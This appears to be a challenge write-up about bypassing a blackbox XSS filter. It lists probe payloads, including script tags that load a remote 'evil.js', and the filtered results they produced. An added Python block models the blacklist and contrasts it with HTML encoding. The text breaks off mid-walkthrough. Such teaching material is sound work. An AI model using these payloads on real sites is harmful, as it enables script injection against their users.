As you may already know, we recently held our very first XSS challenge, with the prize being a book of the winner's choice on information security. This challenge was a bit tricky, and if you didn't focus on the right path you would end up with no results. We received around 10k requests (around 2MB of data; thanks for not using scanners) from attendees trying to solve the challenge.
The main goal of this challenge was divided into three criteria:
- Reverse engineering of blackbox filters
- Finding a way to bypass attribute RegExp filter
Now we will discuss all three problems.
Part I: Reverse engineering of filters
The first test is obviously the script tag itself. I tried injecting the following payloads:
<script>alert(0);</script>
<scrIpt>alert(0);</script>
<script src="http://zdresearch.com/evil.js">
<%0ascript SrC="http://zdresearch.com/evil.js">
<scri%00ipt>alert(0);</script>
And I got the following results:
[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : _
[+] Injected Data : <_script_"_zdresearch_com_evil__">
[+] Injected Data : <scri_ipt>alert_0_;<_script>
Up to now I can easily tell that the script tag is filtered. On top of that, src, /, http://, .js and () are all filtered and replaced by an underscore (_).
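A model of the observed blacklist, as an added example that is not the challenge's actual filter code: it applies the token replacements listed above and puts them beside contextual output encoding, which is what a defender should use instead of a blacklist. The BLACKLIST list and the function names are my assumptions, and the model is simplified (the real filter collapsed whole tags in some cases).

```python
import html
import re

# Assumption: the tokens the probes above showed being replaced by "_".
# This models the behaviour the post describes, not the real challenge filter.
BLACKLIST = ["http://", "script", "src", ".js", "()", "/"]
BLACKLIST_RE = re.compile(
    "|".join(re.escape(t) for t in sorted(BLACKLIST, key=len, reverse=True)),
    re.IGNORECASE,
)


def blacklist_filter(payload: str) -> str:
    """Blacklist model: every listed token becomes a single underscore.
    Note what it leaves alone: '<', '>', '"' and '=' survive untouched,
    so the tag structure of the input is still intact after filtering."""
    return BLACKLIST_RE.sub("_", payload)


def encode_for_html_body(payload: str) -> str:
    """Defender's fix for an HTML body or quoted-attribute context: encode
    the characters that carry meaning to the HTML parser instead of hunting
    for 'bad words'. No token list to reverse engineer, nothing to bypass."""
    return html.escape(payload, quote=True)


def still_has_markup(s: str) -> bool:
    """Check a defender can run on filter output: does anything the HTML
    parser treats as structure survive? True means the filter failed."""
    return any(ch in s for ch in "<>\"'")


if __name__ == "__main__":
    # Probes taken from the post (constructed input for this demo).
    for probe in ['<script>alert(0);</script>',
                  '<script src="http://zdresearch.com/evil.js">']:
        print("blacklist :", blacklist_filter(probe),
              "| markup left:", still_has_markup(blacklist_filter(probe)))
        print("encoded   :", encode_for_html_body(probe),
              "| markup left:", still_has_markup(encode_for_html_body(probe)))
```

html.escape covers the HTML body and double-quoted attribute value contexts only; a value landing inside a script block or a URL attribute needs that context's own encoder.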
At this point we have to find a valid tag with attributes; for example, we can go for a tag with href: